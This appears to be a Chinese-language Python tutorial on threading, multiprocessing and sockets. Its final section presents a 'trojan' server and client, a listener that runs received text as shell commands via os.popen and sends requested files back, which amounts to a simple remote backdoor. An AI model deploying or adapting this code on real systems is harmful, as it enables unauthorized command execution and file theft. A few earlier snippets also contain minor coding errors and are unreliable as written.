[TOC]

多线程(threading)

基础多线程

import threading
import time

def run(n):
    print("task", n)
    time.sleep(1)
    print('2s')
    time.sleep(1)
    print('1s')
    time.sleep(1)
    print('0s')
    time.sleep(1)

if __name__ == '__main__':
    t1 = threading.Thread(target=run, args=("t1",))
    t2 = threading.Thread(target=run, args=("t2",))
    t1.start()
    t2.start()

自定义多线程

import threading
import time

class MyThread(threading.Thread):
    def __init__(self, n):
        super(MyThread, self).__init__()  # 重构run函数必须要写
        self.n = n

    def run(self):# 重写run方法
        print("task", self.n)
        time.sleep(1)
        print('2s')
        time.sleep(1)
        print('1s')
        time.sleep(1)
        print('0s')
        time.sleep(1)

if __name__ == "__main__":
    t1 = MyThread("t1")
    t2 = MyThread("t2")
    t1.start()
    t2.start()

守护线程

当主线程结束是,子线程立刻结束,这里使用,setDemon(True),在start前进行调用。

import threading
import time

class MyThread(threading.Thread):
    def __init__(self, n):
        super(MyThread, self).__init__()  # 重构run函数必须要写
        self.n = n

    def run(self):# 重写run方法
        print("task", self.n)
        time.sleep(1)
        print('2s')
        time.sleep(1)
        print('1s')
        time.sleep(1)
        print('0s')
        time.sleep(1)

if __name__ == "__main__":
    t1 = MyThread("t1")
    t1.setDaemon(True)
    t1.start()
    print("end")

主线程等待子线程结束

当主线程想要结束时,会等待子线程完全结束再进行。使用join(),在住现场开始后进行使用。

import threading
import time

class MyThread(threading.Thread):
    def __init__(self, n):
        super(MyThread, self).__init__()  # 重构run函数必须要写
        self.n = n

    def run(self):  # 重写run方法
        print("task", self.n)
        time.sleep(1)
        print('2s')
        time.sleep(1)
        print('1s')
        time.sleep(1)
        print('0s')
        time.sleep(1)

if __name__ == "__main__":
    t1 = MyThread("t1")
    t1.setDaemon(True)
    t1.start()
    t1.join()   
    print("end")

因为线程是随机进行调度的,当多个线程同时修改同一条数据时可能会出现脏数据,所以,出现了线程锁,即同一时刻只允许一个线程执行操作。

互斥锁

import threading
import time

class MyThread(threading.Thread):
    def __init__(self, n):
        super(MyThread, self).__init__()  # 重构run函数必须要写
        self.n = n

    def run(self):
        lock.acquire()#获取锁
        print("task", self.n)
        time.sleep(1)
        print('2s')
        time.sleep(1)
        print('1s')
        time.sleep(1)
        print('0s')
        time.sleep(1)
        lock.release()#释放锁

if __name__ == "__main__":
    lock = threading.Lock() # 实例化一个锁对象
    t1 = MyThread("t1")
    t1.setDaemon(True)
    t1.start()
    t1.join()
    print("end")

代码中调用了lock.acquire() 获取锁,通过lock.release()释放锁,两者之间的代码同时只能被一个线程访问。

信号量(BoundedSemaphore)

互斥锁同时只允许一个线程更改数据,而Semaphore是同时允许一定数量的线程更改数据

import threading
import time

def run(n,semaphore):
    semaphore.acquire() #获取锁
    time.sleep(1)
    print("run the thread:{}\n").format(n)
    semaphore.release() #释放锁
if __name__ == "__main__":
    semaphore =  threading.BoundedSemaphore(5) # 最多同时满足5个线程运行
    for i in range(22):
        t = threading.Thread(target=run, args=("t-%s" % i, semaphore))
        t.start()
    while threading.active_count() != 1:
        pass  # print threading.active_count()
    else:
        print('-----all threads done-----')

多进程(multiprocessing)

基础多进程

import multiprocessing
import os

def info(titles):
    print(titles)
    print('module name:', __name__)
    print('parent process:', os.getppid())  # 获取当前进程的父进程id
    print('process id:', os.getpid()) # 获取当前进程的id
def f(name):
    info("function f")
    print("hello",name)
if __name__ == "__main__":
    s = multiprocessing.Process(target=f, args=('bob',))
    s.start()    # 开始
    s.join()    # 等子进程完全结束

多进程的使用方法基本和多线程一样

多进程间进行通信

Queue

  • Queue类提供了put方法存放数据,get方法获取数据,get方法获取数据的同上会清空队列。
# -*- coding: UTF-8 -*-

from multiprocessing import Process, Queue
import time

def f(q, data):
    q.put(data)#添加数据
def out(q):
    time.sleep(4)
    print(q.get())#获取数据

if __name__ == '__main__':
    q = Queue()#创建Queue实例
    p = Process(target=f, args=(q, [1, 2, 3]))
    p.start()
   
    p.join()

    p1 = Process(target=out,args=(q,))
    p1.start()
    
    p1.join()

进程锁

这里和多线程是差不多的,都是使用lock()

import multiprocessing 
import time

def job(v, num, l):
    l.acquire() # 锁住
    for _ in range(5):
        time.sleep(0.1) 
        v.value += num # 获取共享内存
        print(v.value)
    l.release() # 释放

def multicore():
    l = multiprocessing.Lock() # 定义一个进程锁
    v = multiprocessing.Value('i', 0) # 定义共享内存
    p1 = multiprocessing.Process(target=job, args=(v,1,l)) # 需要将lock传入
    p2 = multiprocessing.Process(target=job, args=(v,3,l)) 
    p1.start()
    p2.start()
    p1.join()
    p2.join()

if __name__ == '__main__':
    multicore()

进程池(Pool)

由于进程启动的开销比较大,使用多进程的时候会导致大量内存空间被消耗。为了防止这种情况发生可以使用进程池。进程池会缓存一些进程在池子中,使用的时候直接拿来用,使用完毕回收到池子中。

进程池中常用方法:

  • apply() 同步执行(串行)
  • apply_async() 异步执行(并行)
  • terminate() 立刻关闭进程池
  • join() 主进程等待所有子进程执行完毕。必须在close或terminate()之后。
  • close() 等待所有进程结束后,才关闭进程池。
from  multiprocessing import Process,Pool
import time
 
def Foo(i):
    time.sleep(2)
    return i+100
 
def Bar(arg):
    print('-->exec done:',arg)
 
pool = Pool(5)  #允许进程池同时放入5个进程
 
for i in range(10):
    pool.apply_async(func=Foo, args=(i,),callback=Bar)  #func子进程执行完后,才会执行callback,否则callback不执行(而且callback是由父进程来执行了)
 
print('end')
pool.close()
pool.join() #主进程等待所有子进程执行完毕。必须在close()或terminate()之后。

进程池内部维护一个进程序列,当使用时,去进程池中获取一个进程,如果进程池序列中没有可供使用的进程,那么程序就会等待,直到进程池中有可用进程为止。在上面的程序中产生了10个进程,但是只能有5同时被放入进程池,剩下的都被暂时挂起,并不占用内存空间,等前面的五个进程执行完后,再执行剩下5个进程。

socket编程

常用的方法:

  • socket.bind(address):将socket绑定到指定的address,指定的address可以是一个元组,包含IP 和端口
  • socket.accept() 作为服务端使用的socket调该方法接受来自客户端的连接。
  • socket.close()关闭连接
  • socket.recv(): 接收socket中的数据,该方法返回一个bytes对象代表接收到的数据
  • socket.send(bytes[, flags]) 向socket中发送数据,该socket必须与远程socket之间建立了连接。
  • socket.listen()服务端使用socket调用监听

客户端(tcp)

Socket客户端编程的基本步骤:

  • 创建套接字

    • s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  • 连接服务端

    • s.connect((('127.0.0.1', 8000)))
  • 发送数据

    • s.sendall(message)
  • 接收数据

    • reply = s.recv(4096)
  • 关闭连接
# -*- coding: UTF-8 -*-

import socket
import sys

#测试类
class Client:
    def __init__(self,host):
        self.host=host #待连接的远程主机的域名
    def connet(self): #连接方法
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        except socket.error as e:
            print("Failed to create socket. Error: %s"%e)
            sys.exit() #退出进程
        try:
            remote_ip = socket.gethostbyname(self.host)#根据域名获取ip
        except socket.gaierror:
            print('主机无法被解析')
            sys.exit() #退出进程
        try:
            s.connect((remote_ip,80))#连接
            message = b"GET / HTTP/1.1\r\n\r\n"
            s.sendall(message)#发送数据
            reply = s.recv(4096)#接收数据
            print(reply)
            s.close()#关闭连接
        except socket.error:
            sys.exit() #退出进程


if __name__ == '__main__':
    cl = Client('www.baidu.com')
    cl.connet()

服务端(TCP)

  • 服务端先创建一个socket对象
  • 服务端socket将自己绑定到指定IP和端口
  • 服务端socket调用自己的listen()方法
  • 程序不断循环接收来自客户端的连接
#创建socket对象
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 将socket绑定到本机IP地址和端口
s.bind(('0.0.0.0', 8000))
#服务端开始监听来自客户端的连接
s.listen()
while True:
       #每当接收到客户端请求时,就返回对应的socket和远程地址
      c, addr = s.accept()

小实例

服务段

import socket
import threading
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(('0.0.0.0', 8000))
server.listen()

def handle_sock(sock, addr):
    while True:
        data = sock.recv(1024)
        print(data.decode("utf8"))
        re_data = input()
        sock.send(re_data.encode("utf8"))

while True:
sock, addr = server.accept()
'''用线程去处理新接收的连接(用户)'''
client_thread = threading.Thread(target=handle_sock, args=(sock, addr))#传的一定是函数名称
client_thread.start()

客户端

import socket

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('127.0.0.1', 8000))
while True:
    re_data = input()
    client.send(re_data.encode("utf8"))
    data = client.recv(1024)
    print(data.decode("utf8"))

木马小实例

服务端

# -*- coding: UTF-8 -*-

import socket
import sys
import os


class server:
    def __init__(self, ip, port):
        self.port = port
        self.ip = ip
        self.bufferSize = 10240

    def start(self):  # 启动监听,接收数据
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.bind((self.ip, self.port))  # 绑定
            s.listen(10)  # 监听
            print('等待客户端连接')
            while True:  # 一直等待新的连接
                try:
                    conn, addr = s.accept()  # 接收连接
                    print('客户端连接 ' + addr[0] + ':' + str(addr[1]))
                    while True:  # 保持长连接
                        data = conn.recv(self.bufferSize)#接收数据
                        if not data:#断开连接时退出当前循环
                            break
                        else:
                            self.executeCommand(conn,data)
                    conn.close()#关闭当前连接
                except socket.error as e:
                    print(e)
                    conn.close()  # 关闭连接
        finally:
            s.close()  # 关闭服务端

    def executeCommand(self, tcpCliSock, data):  # 解析并执行命令
        try:#
            message = data.decode("utf-8")
            if os.path.isfile(message):#判断是否是文件
                filesize = str(os.path.getsize(message))#获取文件大小
                print("文件大小为:",filesize)
                tcpCliSock.send(filesize.encode())#发送文件大小
                data = tcpCliSock.recv(self.bufferSize)  
                print("开始发送")
                f = open(message, "rb")#打开文件
                for line in f:
                    tcpCliSock.send(line)#发送文件内容
            else:
                tcpCliSock.send(('0001'+os.popen(message).read()).encode('utf-8'))
        except:
            raise

if __name__ == '__main__':
    s = server('', 8000)
    s.start()

客户端

# -*- coding: UTF-8 -*-

import socket
import sys
import re
import os

class Client:
    def __init__(self,serverIp,serverPort):
        self.serverIp=serverIp #待连接的远程主机的域名
        self.serverPort = serverPort
        self.bufferSize = 10240

    def connet(self): #连接方法
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        except socket.error as e:
            print("Failed to create socket. Error: %s"%e)
            
        try:
            s.connect((self.serverIp,self.serverPort))
            while True:
                message = input('> ')#接收用户输入
                if not message:
                    break
                s.send(bytes(message, 'utf-8'))#发送命令
                data = s.recv(10240)#接收数据
                if not data:
                    break
                if re.search("^0001",data.decode('utf-8','ignore')):#判断数据类型
                    print(data.decode('utf-8')[4:])
                else:#文件内容处理
                    s.send("File size received".encode())#通知服务端可以发送文件了
                    file_total_size = int(data.decode())#总大小
                    received_size = 0
                    f = open("new" +os.path.split(message)[-1], "wb")#创建文件
                    while received_size < file_total_size:
                        data = s.recv(10240)
                        f.write(data)#写文件
                        received_size += len(data)#累加接收长度
                        print("已接收:", received_size)
                    f.close()#关闭文件
                    print("receive done", file_total_size, " ", received_size)
        except socket.error:
            s.close()
            raise #退出进程
        finally:
            s.close()

        


if __name__ == '__main__':
    cl = Client('127.0.0.1',8000)
    cl.connet()
    sys.exit() #退出进程
最后修改:2021 年 02 月 15 日 01 : 46 PM
如果觉得我的文章对你有用,请随意赞赏